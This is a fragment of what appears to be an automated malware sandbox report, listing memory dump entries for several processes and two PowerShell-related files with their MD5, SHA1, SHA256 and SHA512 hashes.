memory/2964-170-0x0000000000000000-mapping.dmp

memory/2280-171-0x0000000000000000-mapping.dmp

memory/372-172-0x0000000000000000-mapping.dmp

memory/3220-173-0x0000000000000000-mapping.dmp

memory/3968-174-0x0000000000000000-mapping.dmp

memory/3068-175-0x0000000000000000-mapping.dmp

memory/3864-176-0x0000000000000000-mapping.dmp

memory/3208-177-0x0000000000000000-mapping.dmp

memory/1980-178-0x0000000000000000-mapping.dmp

memory/1404-179-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-180-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-181-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-182-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-183-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-184-0x000001B0D74E0000-0x000001B0D7502000-memory.dmp

memory/1404-185-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-186-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-188-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-187-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-189-0x000001B0F1B00000-0x000001B0F1B76000-memory.dmp

memory/1404-190-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-212-0x000001B0EFA20000-0x000001B0EFA22000-memory.dmp

memory/1404-213-0x000001B0EFA23000-0x000001B0EFA25000-memory.dmp

memory/1404-214-0x000001B0EFA26000-0x000001B0EFA28000-memory.dmp

memory/1404-217-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/1404-218-0x000001B0D5930000-0x000001B0D5932000-memory.dmp

memory/2076-220-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-221-0x0000025699130000-0x0000025699132000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

memory/2076-222-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-223-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-224-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-225-0x00000256B1870000-0x00000256B1892000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5002ed500e75ed22441076ac819003
SHA1 710cc7878e499af7514b2c874ad2c7b912affbc7
SHA256 8892ad94c31cba0ad62ec86c9db78d221dd2a8a43bdf5e8014b1d7e221ad1ac7
SHA512 b5a8b0adba1bc3c1527a3fe5581e53433d1f0e59ad44003a2e7d53f1272075873ff8023ab01eea0e7c9b3e907f8249ad29fc17b7d7d0b8cc9d3c645afa1766e7

memory/2076-227-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-228-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-229-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-230-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-231-0x00000256B3A40000-0x00000256B3AB6000-memory.dmp

memory/1404-232-0x000001B0EFA28000-0x000001B0EFA29000-memory.dmp

memory/2076-233-0x00000256B18E0000-0x00000256B18E2000-memory.dmp

memory/2076-234-0x00000256B18E3000-0x00000256B18E5000-memory.dmp

memory/2076-235-0x0000025699130000-0x0000025699132000-memory.dmp

memory/2076-262-0x00000256B18E8000-0x00000256B18E9000-memory.dmp

memory/2076-261-0x00000256B18E6000-0x00000256B18E8000-memory.dmp